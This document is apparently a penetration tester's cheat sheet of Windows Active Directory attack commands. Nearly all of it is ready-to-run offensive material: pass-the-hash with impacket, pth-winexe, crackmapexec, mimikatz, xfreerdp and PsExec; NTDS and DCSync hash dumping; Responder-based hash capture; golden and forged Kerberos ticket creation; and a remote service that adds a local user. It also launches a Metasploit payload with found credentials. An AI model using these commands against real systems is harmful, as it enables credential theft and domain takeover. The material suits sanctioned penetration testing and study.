PASS THE HASH TECHNIQUES
# WMIEXEC
proxychains python /opt/ActiveDirectory/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200
# SMBCLIENT
smbclient -U domain/user%hash:hash -n <netbios name> -W <domain> //<ip>/share$
# PTH-WINEXE
pth-winexe -U administrator%aad3b435b51404eeaad3b435b51404ee:3fee04b01f59a1001a366a7681e95699 //10.11.1.123 cmd
# PTH-SMBCLIENT
pth-smbclient //CORPDC01/c$ -U corp/user_a%aad3b435b51404eeaad3b435b51404ee:48663e7b299fe3a7047b937804cdc34d
# CRACKMAPEXEC
crackmapexec <ip> -u user -H <hash>
# MIMIKATZ
privilege::debug
sekurlsa::pth /user:<user> /domain:<domain.com> /ntlm:<hash>
# RDP
xfreerdp /u:admin /d:domain /pth:hash:hash /v:192.168.1.101
# METASPLOIT
use exploit/windows/smb/psexec
set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
# PSEXEC
PsExec.exe -accepteula \\corpsqlserver01 -s -u corp\user_a -p aad3b435b51404eeaad3b435b51404ee:48663e7b299fe3a7047b937804cdc34d cmd.exe
# IMPACKET SECRETS DUMP
secretsdump.py -just-dc-ntlm -user-status -outputfile ./NTDSData/CORP/ntds20170711-13.05 -hashes aad3b435b51404eeaad3b435b51404ee:48663e7b299fe3a7047b937804cdc34d corp/user_a@corpdc01
# USING FOUND PASSWORD
$Passw = ConvertTo-SecureString 'P@ssw0rd1!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('DOMAIN\user', $Passw)
Start-Process C:\Windows\System32\spool\drivers\color\msf.exe -Credential $Cred
Check For Stored Credentials
cmdkey /list
Use Stored Credentials:
runas /user:administrator /savecred "cmd.exe /k whoami"
Access SMB With Credentials:
python /usr/share/doc/python3-impacket/examples/smbclient.py <Domain>/<user>@<ip> -hashes <part1>:<part2>
In Metasploit
use auxiliary/scanner/smb/smb_login
crackmapexec <ip(s)> -d <domain> -u <user> -p <pass>
exploit/windows/smb/psexec
Map A Drive
net use z: \\<ip>\c$ /user:<username> <password>
Gain A Hash
1.) Start Responder. Be sure to include --lm
responder -I tun0 --lm
2.) Run dementor.py to obtain an NTLM response
proxychains python dementor.py -d htb.local -u <user> -p <password> <target ip> <listening ip>
METERPRETER KIWI
Get Hash As Domain Admin (kiwi):
dcsync_ntlm <domain>\\<user>
Create Golden Ticket (kiwi):
golden_ticket_create -d <domain> -k <krbtgt hash> -s <domain-sid> -u <name, does not have to exist (but can)> -t <filename>
Create Skeleton Ticket With Impacket
python ticketer.py -nthash <hash> -domain-sid <sid> -domain OsbornePro DEV\$
OR
python ticketer.py -nthash <hash> -domain-sid <sid> -domain HTB DEV
OR
python ticketer.py -nthash <hash> -domain-sid <sid> -domain OsbornePro -spn cifs/<ip> <username>
USE THAT CREATED SKELETON TICKET:
1.) Set Value
export KRB5CCNAME=/root/Downloads/Tickets/OsbornePro.cache
2.) Edit krb5.conf File
nano /etc/krb5.conf
# CONTENTS
[realms]
DOMAIN.COM = {
kdc = dev.domain.com
kdc = web.domain.com
kdc = dc.domain.com
admin_server = dc.domain.com
}
3.) Connect To Target
proxychains smbclient \\\\<IP>\\C$ -U <user> -C -N
Create A Service To Exploit:
1.) Create A Service To Make A User
python /usr/share/doc/python3-impacket/examples/services.py -dc-ip <ip of domain controller> -k -no-pass <ip of target> create -name <username> -display <username> -path 'net user <username> <password> /add'
2.) Check The Service Values
proxychains python /usr/share/doc/python3-impacket/examples/services.py -dc-ip <DC IP> -k -no-pass <targetIP> config -name <createduser>
3.) Start The Service To Execute Command
proxychains python /opt/ActiveDirectory/impacket/examples/services.py -dc-ip <DC IP> -k -no-pass <TargetIP> start -name <username>
Use Golden Ticket (kiwi):
kerberos_ticket_use <filename>
Dump Domain Hashes With DCSync:
log
lsadump::dcsync /domain:<domain> /all /csv
Create Golden Ticket Mimikatz:
kerberos::golden /user:<name> /domain:<domain> /sid:<domain-sid> /krbtgt:<krbtgt hash> /ticket:<filename> /groups:<comma separated groups this 'virtual' user is part of>
Use Golden Ticket Mimikatz:
kerberos::ptt <filename>
====================
LINUX
====================
Become another user
su <username>
Become root User:
su -
OR
su root
Execute Command As Root:
sudo <command>
Execute Command As Another User:
sudo -u <username> <command>